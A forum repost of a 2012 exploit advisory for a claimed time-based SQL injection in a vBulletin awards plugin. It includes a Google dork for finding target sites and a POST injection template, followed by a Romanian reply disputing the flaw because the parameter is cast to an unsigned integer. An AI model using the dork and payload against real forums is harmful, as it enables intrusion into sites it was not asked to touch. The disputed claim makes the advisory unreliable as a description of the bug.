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vBulletin Yet Another Awards System 4.0.2 SQL Injection

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vBulletin Yet Another Awards System 4.0.2 SQL Injection

Authored by Backsl@sh/Dan

Posted Aug 31, 2012

# Exploit Title: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
# Google Dork: inurl:awards.php intext:"powered by vbulletin"
# Date: 29/08/12
# Exploit Author: Backsl@sh/Dan
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684
# Version: 4.0.2+

The vulnerability exists within /request_award.php.

$vbulletin->input->clean_array_gpc('p', array(
'award_id' => TYPE_UINT,
//'award_request_name' => TYPE_STR,
//'award_request_recipient_name' => TYPE_STR,
'award_request_reason' => TYPE_STR,
'award_request_uid' => TYPE_UNIT,

> $award_request_uid = $vbulletin->GPC['award_request_uid'];
> > $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string($vbulletin->GPC['award_request_reason']) ."')");

$award_request_uid is used within an insert into statement, unsanitized.

- POC -
POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit

Thanks. Have fun.


Sursa: vBulletin Yet Another Awards System 4.0.2 SQL Injection ? Packet Storm


Nu e bun.

$vbulletin->input->clean_array_gpc('p', array(

'award_id' => TYPE_UINT,

//'award_request_name' => TYPE_STR,

//'award_request_recipient_name' => TYPE_STR,

'award_request_reason' => TYPE_STR,

'award_request_uid' => TYPE_UNIT,


Din tipurile de date vBulletin:


Will check that it is an unsigned integer

Variabila e trecuta prin clean_array_gpc() ca unsigned integer. Ce zice ala acolo ca nu e sanitizat e gresit.

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